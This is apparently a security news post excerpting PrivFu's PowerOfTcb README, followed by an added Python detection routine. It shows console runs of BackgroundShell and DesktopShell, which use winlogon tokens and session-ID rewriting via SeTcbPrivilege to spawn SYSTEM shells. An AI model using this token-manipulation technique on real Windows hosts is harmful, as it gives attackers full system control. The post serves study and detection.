[Intel] A detailed look at the SeTcbPrivilege privilege-escalation technique; the author provides a PoC walkthrough

2024-08-07 14:43   Hong Kong, China
  • Create GUI Session Process


Where a vulnerability such as DLL hijacking or modification of a SYSTEM-privileged service's configuration exists, the loaded PE file is executed from the background session. This tool demonstrates how to obtain a GUI session process from a background process. To test session ID manipulation, I wrote a tool in executable format named DesktopShell. But background session processes are hard to debug, so I wrote a tool named BackgroundShell to create a session 0 shell using SeTcbPrivilege and SeAssignPrimaryTokenPrivilege.

    PS C:\Dev> whoami /user

    USER INFORMATION
    ----------------

    User Name           SID
    ==================== =============================================
    desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001
    PS C:\Dev> whoami /groups | findstr /i level
    Mandatory Label\High Mandatory Level                         Label           S-1-16-12288

    PS C:\Dev> .\BackgroundShell.exe
    [+] SeDebugPrivilege is enabled successfully.
    [+] SeImpersonatePrivilege is enabled successfully.
    [+] Got a primary token from winlogon.exe (Handle = 0x2D4).
    [+] Got a impersonation token from winlogon.exe (Handle = 0x2DC).
    [+] Current session ID is 1.
    [+] Impersonation as winlogon.exe is successful.
    [+] Token session ID is updated from 1 to 0 successfully.
    Microsoft Windows [Version 10.0.22631.2428]
    (c) Microsoft Corporation. All rights reserved.

    C:\Dev>whoami /user

    USER INFORMATION
    ----------------

    User Name           SID
    =================== ========
    nt authority\system S-1-5-18

    C:\Dev>whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                  Description                                   State
    =============================== ============================================= ========
    SeAssignPrimaryTokenPrivilege   Replace a process level token                 Disabled
    SeIncreaseQuotaPrivilege        Adjust memory quotas for a process            Disabled
    SeTcbPrivilege                  Act as part of the operating system           Enabled
    SeSecurityPrivilege             Manage auditing and security log              Disabled
    SeTakeOwnershipPrivilege        Take ownership of files or other objects      Disabled
    SeLoadDriverPrivilege           Load and unload device drivers                Disabled
    SeProfileSingleProcessPrivilege Profile single process                        Enabled
    SeIncreaseBasePriorityPrivilege Increase scheduling priority                  Enabled
    SeCreatePermanentPrivilege      Create permanent shared objects               Enabled
    SeBackupPrivilege               Back up files and directories                 Disabled
    SeRestorePrivilege              Restore files and directories                 Disabled
    SeShutdownPrivilege             Shut down the system                          Disabled
    SeDebugPrivilege                Debug programs                                Enabled
    SeAuditPrivilege                Generate security audits                      Enabled
    SeSystemEnvironmentPrivilege    Modify firmware environment values            Disabled
    SeChangeNotifyPrivilege         Bypass traverse checking                      Enabled
    SeUndockPrivilege               Remove computer from docking station          Disabled
    SeManageVolumePrivilege         Perform volume maintenance tasks              Disabled
    SeImpersonatePrivilege          Impersonate a client after authentication     Enabled
    SeCreateGlobalPrivilege         Create global objects                         Enabled
    SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Disabled

DesktopShell implements two methods to create a cmd.exe process.

C:\Dev>.\DesktopShell.exe
Usage: DesktopShell.exe <0 or 1>


If 0 is set, it simply executes cmd.exe with the CreateProcess API, and cmd.exe does not appear in the GUI session, as shown below:

C:\Dev>DesktopShell.exe 0
[>] Simply executing CreateProcess().
[+] C:\Windows\system32\cmd.exe is executed successfully (PID: 9496).

If 1 is set, it tries to find the GUI session ID, enables SeTcbPrivilege and SeAssignPrimaryTokenPrivilege, duplicates the process token, sets the GUI session ID on the duplicated token, and creates a cmd.exe process with that token:

C:\Dev>DesktopShell.exe 1
[>] Trying to create desktop shell.
[+] SeTcbPrivilege is enabled successfully.
[+] GUI session ID is 1.
[+] Current token is opened successfully.
[+] Current token is duplicated successfully (Handle = 0x2F0).
[+] Token Session ID is updated successfully.
[+] C:\Windows\system32\cmd.exe is executed in desktop session (PID: 10684).
[*] Done.

If you want to check the DLL version, use DesktopShellLib. It exports a GetShell function that simply executes cmd.exe with CreateProcess, and a GetDesktopShell function that executes cmd.exe in the GUI session.

The above is an excerpt of the original text; for the original, see: https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb
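The DesktopShell run above leaves a distinctive trace for defenders: a SYSTEM process in an interactive session whose parent still lives in session 0. The following detection logic is an added example (not code from PrivFu); the snapshot fields, the vulnsvc.exe service name and the smss.exe allow-list are constructed for illustration.

```python
from typing import Dict, List

# Constructed allow-list for this example: smss.exe legitimately starts
# csrss.exe and winlogon.exe in every new session, so it is excluded.
EXPECTED_CROSS_SESSION_PARENTS = {"smss.exe"}
SYSTEM_SID = "S-1-5-18"
USER_SID = "S-1-5-21-1955100404-698441589-1496171011-1001"

def find_session_hops(processes: List[Dict]) -> List[Dict]:
    """Flag children that hold the SYSTEM token in a non-zero (interactive)
    session while their parent runs in session 0: the trace left behind when
    a background process rewrites its token's session ID as shown above."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for proc in processes:
        parent = by_pid.get(proc["ppid"])
        if parent is None:  # parent already exited or missing from the snapshot
            continue
        if parent["name"].lower() in EXPECTED_CROSS_SESSION_PARENTS:
            continue
        if parent["session"] == 0 and proc["session"] != 0 and proc["sid"] == SYSTEM_SID:
            findings.append({"pid": proc["pid"], "name": proc["name"],
                             "session": proc["session"],
                             "parent_pid": parent["pid"], "parent_name": parent["name"]})
    return findings

# Constructed snapshot modelled on the DesktopShell run above: a SYSTEM service
# (hypothetical vulnsvc.exe) in session 0 spawns one cmd.exe that stays in
# session 0 (mode 0) and one that lands in the user's GUI session 1 (mode 1).
SAMPLE_SNAPSHOT = [
    {"pid": 520,   "ppid": 4,    "name": "smss.exe",     "session": 0, "sid": SYSTEM_SID},
    {"pid": 600,   "ppid": 520,  "name": "wininit.exe",  "session": 0, "sid": SYSTEM_SID},
    {"pid": 640,   "ppid": 520,  "name": "winlogon.exe", "session": 1, "sid": SYSTEM_SID},
    {"pid": 700,   "ppid": 600,  "name": "services.exe", "session": 0, "sid": SYSTEM_SID},
    {"pid": 3100,  "ppid": 700,  "name": "vulnsvc.exe",  "session": 0, "sid": SYSTEM_SID},
    {"pid": 9496,  "ppid": 3100, "name": "cmd.exe",      "session": 0, "sid": SYSTEM_SID},
    {"pid": 10684, "ppid": 3100, "name": "cmd.exe",      "session": 1, "sid": SYSTEM_SID},
    {"pid": 4200,  "ppid": 1,    "name": "explorer.exe", "session": 1, "sid": USER_SID},
    {"pid": 5300,  "ppid": 4200, "name": "cmd.exe",      "session": 1, "sid": USER_SID},
]

if __name__ == "__main__":
    for hit in find_session_hops(SAMPLE_SNAPSHOT):
        print(f"[!] PID {hit['pid']} ({hit['name']}) in session {hit['session']} "
              f"spawned by PID {hit['parent_pid']} ({hit['parent_name']}) in session 0")
```

On a live host the same fields come from a process listing (for example Win32_Process plus the owner SID), and services that legitimately place processes in user sessions will need adding to the allow-list before the rule is alerting-grade.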

安全视安